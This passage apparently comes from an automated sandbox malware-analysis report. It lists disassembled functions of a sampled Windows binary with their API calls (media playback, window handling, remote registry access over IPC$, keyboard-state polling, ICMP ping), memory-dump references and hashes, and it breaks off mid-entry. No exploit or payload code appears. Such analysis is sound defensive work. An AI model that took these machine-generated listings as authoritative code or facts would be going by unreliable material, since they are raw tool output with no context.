                                                      Function 00E9E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E9EA5D
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E9EA73
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9EA84
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E9EA96
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E9EAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: SendString$_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2420728520-1007645807
                                                      • Opcode ID: 7771324fd0a984760ff284a98b11ede7a7bac304628db8fd212f8a51be434fdd
                                                      • Instruction ID: c158b1506bc718ad4045d0d8d086dfe213d4f61d644da97fb990740e9119d5fe
                                                      • Opcode Fuzzy Hash: 7771324fd0a984760ff284a98b11ede7a7bac304628db8fd212f8a51be434fdd
                                                      • Instruction Fuzzy Hash: 13115131A9025D7ADB20E7A2DC4AEFF6BBCEBD1B04F406429B511B20D1EAF05905C6B0
                                                      Function 00E95CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00E95CE2
                                                      • GetWindowRect.USER32(00000000,?), ref: 00E95CFB
                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E95D59
                                                      • GetDlgItem.USER32(?,00000002), ref: 00E95D69
                                                      • GetWindowRect.USER32(00000000,?), ref: 00E95D7B
                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E95DCF
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E95DDD
                                                      • GetWindowRect.USER32(00000000,?), ref: 00E95DEF
                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E95E31
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00E95E44
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E95E5A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E95E67
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: 7adaddc032b5fc15e64b97e11009fb72eab1ceb340418517ac5d871a068e3aa1
                                                      • Instruction ID: c165b9da099cc1f31b8da638bd043393153f2acd145270cde9cda3b400f48177
                                                      • Opcode Fuzzy Hash: 7adaddc032b5fc15e64b97e11009fb72eab1ceb340418517ac5d871a068e3aa1
                                                      • Instruction Fuzzy Hash: DA511CB1A00605AFDF18CF69CD89EAEBBB5EB48700F209129F919F6290D7719E05CB50
                                                      Function 00E48BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E48F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E48BE8,?,00000000,?,?,?,?,00E48BBA,00000000,?), ref: 00E48FC5
                                                      • DestroyWindow.USER32(?), ref: 00E48C81
                                                      • KillTimer.USER32(00000000,?,?,?,?,00E48BBA,00000000,?), ref: 00E48D1B
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00E86973
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E48BBA,00000000,?), ref: 00E869A1
                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E48BBA,00000000,?), ref: 00E869B8
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E48BBA,00000000), ref: 00E869D4
                                                      • DeleteObject.GDI32(00000000), ref: 00E869E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 75d2c05e9f11c865515a5375af9d909154eec39e860d037f2925a518f53c5a94
                                                      • Instruction ID: 08516c06bf31c5139fc7849763d56b49c8cb90b3ef30b14749785dbd2a72808b
                                                      • Opcode Fuzzy Hash: 75d2c05e9f11c865515a5375af9d909154eec39e860d037f2925a518f53c5a94
                                                      • Instruction Fuzzy Hash: 7561CE30502714DFDB259F15EA88B29B7F1FB4031AF10652DE04ABB5A0CB31AD85DF91
                                                      Function 00E49838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49944: GetWindowLongW.USER32(?,000000EB), ref: 00E49952
                                                      • GetSysColor.USER32(0000000F), ref: 00E49862
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 669bbf60b9bfe15c5991578ec13d6b6cd11bd6d2ce2bd169e90c3781a0dc28f6
                                                      • Instruction ID: e85447308351a390839f63ac436ec3fadb6ac13834be34d5990e09fa5a14c11f
                                                      • Opcode Fuzzy Hash: 669bbf60b9bfe15c5991578ec13d6b6cd11bd6d2ce2bd169e90c3781a0dc28f6
                                                      • Instruction Fuzzy Hash: 7541A5311056449FDB245F3DAC44FBA3B65AB4A334F285615FAAAB71E2C7319C42DB10
                                                      Function 00E68D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-3963672497
                                                      • Opcode ID: f5b28752ad84b801b90e0ef6847c3dc6e0d63acafa7cc239579aed9923612c32
                                                      • Instruction ID: a26a3266e46a388cc04d9181954d4205c224c68a36c3cde65990e9811381da8f
                                                      • Opcode Fuzzy Hash: f5b28752ad84b801b90e0ef6847c3dc6e0d63acafa7cc239579aed9923612c32
                                                      • Instruction Fuzzy Hash: 9DC10274A44249AFCF11DFA8E840BADBBF5BF49390F186199F915B7392CB308941CB60
                                                      Function 00E996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00E7F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00E99717
                                                      • LoadStringW.USER32(00000000,?,00E7F7F8,00000001), ref: 00E99720
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E7F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00E99742
                                                      • LoadStringW.USER32(00000000,?,00E7F7F8,00000001), ref: 00E99745
                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00E99866
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 747408836-2268648507
                                                      • Opcode ID: 144a2094f11870aba2f9ecf698c19d0bbff6d81ea0582ce837ae7c3f093f794d
                                                      • Instruction ID: 2e1267e47da1ca59be7466cfbeb26e5d47e098539b23c965385485e104bd8eca
                                                      • Opcode Fuzzy Hash: 144a2094f11870aba2f9ecf698c19d0bbff6d81ea0582ce837ae7c3f093f794d
                                                      • Instruction Fuzzy Hash: 5A414172800209ABCF14FBE4DD4ADEEB7B8AF55340F206069F60572092EB755F49CB61
                                                      Function 00E906DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E907A2
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E907BE
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E907DA
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E90804
                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E9082C
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E90837
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E9083C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 323675364-22481851
                                                      • Opcode ID: 5a3a9469b94d6b58f5b708c46806e2b41751fb4e8abba2e7a2a5120eb2f46965
                                                      • Instruction ID: b2898536d03a1b64ac3be8ea6212d0c61f4c60f257f15026dc359a23f981f9e3
                                                      • Opcode Fuzzy Hash: 5a3a9469b94d6b58f5b708c46806e2b41751fb4e8abba2e7a2a5120eb2f46965
                                                      • Instruction Fuzzy Hash: EF411772C10229AFCF25EBA4DC89CEDBBB8BF44350F545129E915B3161EB709E44CBA0
                                                      Function 00EB3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00EB3C5C
                                                      • CoInitialize.OLE32(00000000), ref: 00EB3C8A
                                                      • CoUninitialize.OLE32 ref: 00EB3C94
                                                      • _wcslen.LIBCMT ref: 00EB3D2D
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00EB3DB1
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EB3ED5
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00EB3F0E
                                                      • CoGetObject.OLE32(?,00000000,00ECFB98,?), ref: 00EB3F2D
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00EB3F40
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EB3FC4
                                                      • VariantClear.OLEAUT32(?), ref: 00EB3FD8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                      • String ID:
                                                      • API String ID: 429561992-0
                                                      • Opcode ID: 2036cc201609a5d35388da905be3670dc88567e7c4715358244833fdc655386a
                                                      • Instruction ID: b1fa1e492a66598e3a9fc8f4fa19311d41ae8952ffc94c97e62067052126c32e
                                                      • Opcode Fuzzy Hash: 2036cc201609a5d35388da905be3670dc88567e7c4715358244833fdc655386a
                                                      • Instruction Fuzzy Hash: 71C169716083019FC700DF68C8859ABBBE9FF89748F10591DF989AB251DB31ED06CB52
                                                      Function 00EA7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00EA7AF3
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EA7B8F
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00EA7BA3
                                                      • CoCreateInstance.OLE32(00ECFD08,00000000,00000001,00EF6E6C,?), ref: 00EA7BEF
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EA7C74
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00EA7CCC
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00EA7D57
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EA7D7A
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00EA7D81
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00EA7DD6
                                                      • CoUninitialize.OLE32 ref: 00EA7DDC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                      • String ID:
                                                      • API String ID: 2762341140-0
                                                      • Opcode ID: 65cf0f38b89ab50d9100eee00bd114d4f4d7c4e351f26151e77337b7e990939e
                                                      • Instruction ID: 522dc9c672fa1f0a66530bc5485c73599e661e5d892cd2beed2090c5c8e1cc5b
                                                      • Opcode Fuzzy Hash: 65cf0f38b89ab50d9100eee00bd114d4f4d7c4e351f26151e77337b7e990939e
                                                      • Instruction Fuzzy Hash: 32C13B75A04109AFCB14DF64C888DAEBBF9FF49304F1494A8E45AEB261C731ED46CB90
                                                      Function 00EC541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EC5504
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC5515
                                                      • CharNextW.USER32(00000158), ref: 00EC5544
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EC5585
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EC559B
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC55AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CharNext
                                                      • String ID:
                                                      • API String ID: 1350042424-0
                                                      • Opcode ID: 5023f2d70e08f9888d67ef71474f915073e4976dd129bd42c7a34f5403f2c8c9
                                                      • Instruction ID: 4e674e28c349409561426675fc7469d6cce725f9e627adc4e0064991ed6964e8
                                                      • Opcode Fuzzy Hash: 5023f2d70e08f9888d67ef71474f915073e4976dd129bd42c7a34f5403f2c8c9
                                                      • Instruction Fuzzy Hash: 3B618B32900608EFDF108F54CE84EFE7BB9FB09724F105159F925B6290D772AA82DB61
                                                      Function 00E8FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E8FAAF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00E8FB08
                                                      • VariantInit.OLEAUT32(?), ref: 00E8FB1A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E8FB3A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00E8FB8D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E8FBA1
                                                      • VariantClear.OLEAUT32(?), ref: 00E8FBB6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00E8FBC3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E8FBCC
                                                      • VariantClear.OLEAUT32(?), ref: 00E8FBDE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E8FBE9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 1bd38bf9d64d95716f71787c5786df324b074132e52caa0c7580de4eb0bee653
                                                      • Instruction ID: 32dbaa75055a567cb57b8bf1cb5257d4718f8ed7ac1dfb0ca1f294cb79e84d33
                                                      • Opcode Fuzzy Hash: 1bd38bf9d64d95716f71787c5786df324b074132e52caa0c7580de4eb0bee653
                                                      • Instruction Fuzzy Hash: A4417135A002199FCB04EF64C858DADBBB9FF08354F109075E85DB7261D731A946CF90
                                                      Function 00E99C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00E99CA1
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E99D22
                                                      • GetKeyState.USER32(000000A0), ref: 00E99D3D
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E99D57
                                                      • GetKeyState.USER32(000000A1), ref: 00E99D6C
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00E99D84
                                                      • GetKeyState.USER32(00000011), ref: 00E99D96
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00E99DAE
                                                      • GetKeyState.USER32(00000012), ref: 00E99DC0
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E99DD8
                                                      • GetKeyState.USER32(0000005B), ref: 00E99DEA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 48ce5893ee94d7d3c371ce5a4fde33cb93e313ddce8e19819e5975d24d2befee
                                                      • Instruction ID: 384e80dc2e23a72990fdad91a8a169dcc6bb2bac209981a492f44945bd593f49
                                                      • Opcode Fuzzy Hash: 48ce5893ee94d7d3c371ce5a4fde33cb93e313ddce8e19819e5975d24d2befee
                                                      • Instruction Fuzzy Hash: 1141D8745047C96EFF30866988447B5FEE06F12348F08905EDAC67B5C3EBA599C8C792
                                                      Function 00EB055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00EB05BC
                                                      • inet_addr.WSOCK32(?), ref: 00EB061C
                                                      • gethostbyname.WSOCK32(?), ref: 00EB0628
                                                      • IcmpCreateFile.IPHLPAPI ref: 00EB0636
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB06C6
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB06E5
                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00EB07B9
                                                      • WSACleanup.WSOCK32 ref: 00EB07BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: b06706a56520a250df16e4f307bbefbd18b56af34221b973b6e52e9cca697aa7
                                                      • Instruction ID: 875c53e1c229d5b26edcb3d51763fda4d940807c20275baacd284f96528ff97c
                                                      • Opcode Fuzzy Hash: b06706a56520a250df16e4f307bbefbd18b56af34221b973b6e52e9cca697aa7
                                                      • Instruction Fuzzy Hash: 47918D35604211AFD320DF15D488F5BBBE4AF44318F1495AAF46AABAA2CB30FD45CF91
                                                      Function 00EB8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
